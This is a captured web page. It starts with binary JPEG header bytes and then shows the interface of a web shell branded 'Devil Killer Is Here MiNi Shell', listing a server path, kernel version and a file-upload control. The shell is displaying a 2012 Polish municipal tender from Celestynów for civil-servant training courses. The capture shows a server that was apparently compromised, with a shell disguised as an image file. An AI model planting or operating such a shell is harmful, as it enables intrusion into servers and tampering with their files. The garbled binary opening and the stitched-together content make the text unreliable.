JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120913/197039-N-2012.html

<p class="kh_header"><b>Celestynów: Organizacja i przeprowadzenie szkoleń, kursów oraz warsztatów w ramach  projektu Profesjonalny i efektywny Urząd Gminy w Celestynowie! Program modernizacji 
i podniesienia jakości zarządzania w Urzędzie Gminy w Celestynowie, w ramach Priorytetu V Dobre rządzenie, Działania 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego CZĘŚĆ 1-21</b><br>
<b>Numer ogłoszenia: 197039 - 2012; data zamieszczenia: 13.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Celestynów , ul. Regucka 3, 05-430 Celestynów, woj. mazowieckie, tel. 22 7897060 w. 114, faks 22 7897011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.celestynów.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie szkoleń, kursów oraz warsztatów w ramach  projektu Profesjonalny i efektywny Urząd Gminy w Celestynowie! Program modernizacji 
i podniesienia jakości zarządzania w Urzędzie Gminy w Celestynowie, w ramach Priorytetu V Dobre rządzenie, Działania 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Unii Europejskiej 
w ramach Europejskiego Funduszu Społecznego CZĘŚĆ 1-21.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia jest organizacja szkoleń/warsztatów w zakresie 21 zagadnień tematycznych  wskazanych w nazwie zamówienia  a określonych szczegółowo w Szczegółowym opisie przedmiotu zamówienia.
ZAŁOŻENIA DO REALIZACJI SZKOLEŃ:
1.Miejsce realizacji szkoleń na terenie powiatu otwockiego.
2. Sale szkoleniowe powinny być wyposażone w:
Projektor/rzutnik multimedialny w połączeniu z komputerem
ekran
sprzęt nagłaśniający, mikrofon bezprzewodowy
flipchart
podłączenie do Internetu
odpowiednią liczbę krzeseł i stolików
klimatyzację
3.	Po stronie Wykonawcy leży zabezpieczenie organizacji i przebiegu szkoleń, w szczególności: sal wykładowych oraz utrzymanie ich w odpowiednim stanie.
4.	Wykonawca ponosi wszelkie koszty związane z zatrudnieniem wykwalifikowalnych wykładowców/kadry trenerskiej z udokumentowanym doświadczeniem trenerskim i kwalifikacjami w zakresie danego szkolenia/kursu/warsztatu (m. in. koszty honorarium, dojazdu, opracowania merytorycznych materiałów).
5.	Wykonawca ma zapewnić opiekę poszkoleniową przez co najmniej 30 dni po zakończeniu realizacji szkolenia.
6.	Wykonawca ma zapewnić dowóz Uczestników do miejsca realizacji szkoleń. Skład jednej grypy wynosi od 12 osób.
7.	Uczestnicy powinni być przez Wykonawcę ubezpieczeni od NNW w całym czasie realizacji szkolenia (dojazd + czas realizacji szkolenia) .
8.	Materiały szkoleniowo - dydaktyczne powinny być zapewnione dla każdego Uczestnika Projektu w formie drukowanej, oprawionej, umożliwiającej swobodną analizę 
(np. skryptu) oraz w wersji elektronicznej (na CD lub innym nośniku danych).
9.	Serwis kawowy (3 przerwy w trakcie szkolenia/kursu/warsztatu)
Dostęp do kawy, herbaty, soków, wody podczas każdej przerwy.
W skład serwisu kawowego wchodzi: kawa, herbata (różne smaki - co najmniej 3), soki (co najmniej 2 rodzaje do wyboru), woda (gazowana i niegazowana), cukier biały, i brązowy, słodzik, cytryna, mleczko do kawy, ciastka - co najmniej 3 rodzaje, owoce (co najmniej 2 rodzaje)
Kawa, herbata - podawana w filiżankach z łyżeczką - nie  w zestawach jednorazowych
Soki, woda - podawane w szklankach - nie  w kubkach jednorazowych
10.	Lunch (1 przerwa)
Zupa  
Drugie danie 
Zestaw warzyw, surówek (3 do wyboru, w tym jedna na ciepło) 
Lunch powinien być podawany na kompleksowej zastawie stołowej - nie  w pojemnikach jednorazowych
11.	Każde szkolenie/warsztat/kurs powinno zakończyć się wydaniem  każdemu z uczestników projektu (beneficjentów ostatecznych) odpowiedniego zaświadczenia/certyfikatu/ dyplomu. (Wzór dokumentu będzie ustalony z Zamawiającym).
12.	Harmonogramy szkoleń będą ustalone z Zamawiającym.
13.	Wykonawca zobowiązany jest do prowadzenia dokumentacji ze szkoleń/kursów/warsztatów oraz informowanie Zamawiającego o rezygnacji z uczestnictwa w szkoleniu lub nieobecności na szkoleniu Beneficjentów Ostatecznych w trakcie jego trwania.
14.	Wykonawca ma zapewnić Zamawiającemu oraz instytucjom współfinansującym projekt oraz innym instytucjom upoważnionym do kontroli pełnej dostępności do dokumentacji dotyczącej wykonywania umowy.
15.	 Wykonawca zobowiązany będzie do zgłaszania Zamawiającemu na piśmie zmian organizacyjnych szkolenia oraz problemów dotyczących realizacji przedmiotu umowy.
16.	Wykonawca zobowiązany jest  do stosowania w całej prowadzonej dokumentacji emblematów PO KL oraz UE.
17.	Wykonawca zobowiązany będzie do przekazania jednego kompletnego egzemplarza dokumentacji (tj. sprawozdania z wykonania zadania, kserokopie listy obecności, dyplomy lub zaświadczenia oraz dokumentację zdjęciową) Zamawiającemu.
18.	Kursy, szkolenia i warsztaty są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
19.	W ramach niniejszego postępowania Zamawiający planuje zrealizować:
a.	dla Części: 7-8, 10-12, 15-17 - po jednej edycji szkoleń (tj. jedna grupa szkoleniowa),
b.	dla Części: 1-6, 9, 13-14, 18-21 - po dwie edycje szkoleń (tj. dwie grupy szkoleniowe)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające o których mowa w art. 67 ust.1 pkt. 6 Pzp. Przedmiot zamówień uzupełniających polega na powtórzeniu tego samego rodzaju zamówień. Zakres jest zgodny z przedmiotem zamówienia podstawowego 
i stanowi do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.51.10.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w przedmiotowym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp dla CZĘŚCI 1-21.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej 2 (dwie) kompleksowe usługi polegające na przeprowadzeniu szkolenia/warsztatu/kursu (w dowolnym zakresie tematycznym), wraz z transportem, wyżywieniem, salami szkoleniowymi z podaniem dat wykonania i odbiorców oraz załączeniem dokumentów (referencje, opinie, zaświadczenia, protokoły odbioru) potwierdzających, że usługi te zostały wykonane należycie- dla  każdej z części 1 -21 ,
oraz dla każdej z części postępowania :

dla  CZĘŚCI 1 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Udzielania zamówień publicznych w JST dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 2 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu  Kodeks postępowania administracyjnego dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 3 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Tworzenia i zarządzania budżetem zadaniowym w JST dla jednostek sektora finansów publicznych,
dla  CZĘŚCI 4 postępowania: minimum dwie  usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Procedury kontroli i audytu w JST  dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 5 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu    z zakresu Zasad planowania rozwoju przestrzennego gminy dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 6 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu    z zakresu Rachunkowości budżetowa w JST dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 7 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Nowoczesnych metod i technik zarządzania zasobami ludzkimi w organizacjach dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 8 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresuRola SKO i RIO w gminnym systemie legislacji lokalnej dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 9 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Zarządzania finansami w JST dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 10 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Zasad prowadzenia zrównoważonego rozwoju gminy dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 11 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu    z zakresu Nowoczesnego zarządzania kryzysowego dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 12 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresie zakresu Prawo gospodarcze i działalność gospodarcza dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 13 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Dobrych praktyk w zakresie redagowania uchwał i zarządzeń w JST dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 14 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Planowania, zarządzania i rozliczania projektów EFS w JST dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 15 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu    z zakresu Planowania, zarządzania i rozliczania projektów EFRR w JST dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 16 postępowania: minimum  dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Zwiększenia efektywności współpracy z organizacjami pozarządowymi na terenie gminy dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 17 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu    z zakresu Zlecania zadań publicznych w gminie dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 18 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresu Profesjonalnej obsługi klienta w urzędzie dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 19 postępowania: minimum dwie usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z  zakresu Efektywnej komunikacji interpersonalnej dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 20 postępowania: minimum dwie  usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu  z zakresie Zasad prowadzenia marketingu regionalnego w administracji samorządowej dla jednostek sektora finansów publicznych, 
dla  CZĘŚCI 21 postępowania: minimum dwie  usługi polegające na przeprowadzeniu szkolenia/ warsztatu/kursu    z zakresu Zasad ogłaszania aktów prawa miejscowego dla jednostek sektora finansów publicznych.W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć Wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik nr 5 do SIWZ  do oferty oraz dokumenty potwierdzającego, że usługi te zostały wykonane należycie (np. referencje, opinie, protokoły odbioru).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy Pzp dla CZĘŚCI 1-21.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę że  dysponuje lub będzie dysponował w czasie realizacji zamówienia osobami wykonującymi  zamówienie posiadającymi następujące kwalifikacje: dla 1  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Udzielania zamówień publicznych w JST oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po grupy min. 12 osób,dla 2  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Kodeks postępowania administracyjnego oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,dla 3  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Tworzenia i zarządzania budżetem zadaniowym oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,dla 4  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Procedur kontroli i audytu w JST oraz posiadającą doświadczenie 
w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 5  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zasad planowania rozwoju przestrzennego gminy oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 6  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Rachunkowość budżetowa w JST oraz posiadającą doświadczenie 
w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 7  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Nowoczesne metody i techniki zarządzania zasobami ludzkimi w organizacjach oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 8  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Rola SKO i RIO w gminnym systemie legislacji lokalnej oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 9  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zarządzanie finansami w JST oraz posiadającą doświadczenie 
w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 10  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zasad prowadzenia zrównoważonego rozwoju gminy oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 11  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Nowoczesne zarządzanie kryzysowe oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 12  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Prawo gospodarcze i działalność gospodarcza oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 13  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Dobre praktyki w zakresie redagowania uchwał i zarządzeń w JST oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 14  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Planowanie, zarządzanie i rozliczanie projektów EFS w JST oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 15  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Planowanie, zarządzanie i rozliczanie projektów EFRR w JST oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 16  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zwiększenia efektywności współpracy z organizacjami pozarządowymi na terenie gminy oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 17  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zlecanie zadań publicznych w gminie oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 18  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Profesjonalna obsługa klienta w urzędzie oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 19  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Efektywna komunikacja interpersonalna oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 20  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zasad prowadzenia marketingu regionalnego w administracji samorządowej oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób,
dla 21  CZĘŚCI postępowania: przynajmniej jedną osobą posiadającą wykształcenie wyższe, minimum roczny staż w zakresie prowadzenia szkoleń, w tym przeprowadzenie szkolenia z zakresu Zasad ogłaszania aktów prawa miejscowego oraz posiadającą doświadczenie w prowadzeniu min. 3 szkoleń dla grup liczących po min. 12 osób.
W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć dla każdej z części Wykaz osób  sporządzony według wzoru stanowiącego Załącznik nr 6 do SIWZ. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich doświadczenia (należy dokładnie opisać prowadzone przez nie szkolenia/zajęcia ze wskazaniem tematyki pozwalającej odnieść je do zakresu przedmiotowego niniejszego zamówienia/części) i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę  posiadania opłaconej  polisy  lub innego dokumentu ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Polisa lub inny dokument świadczący o posiadaniu przez Wykonawcę ubezpieczenia powinny być ważne w dniu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

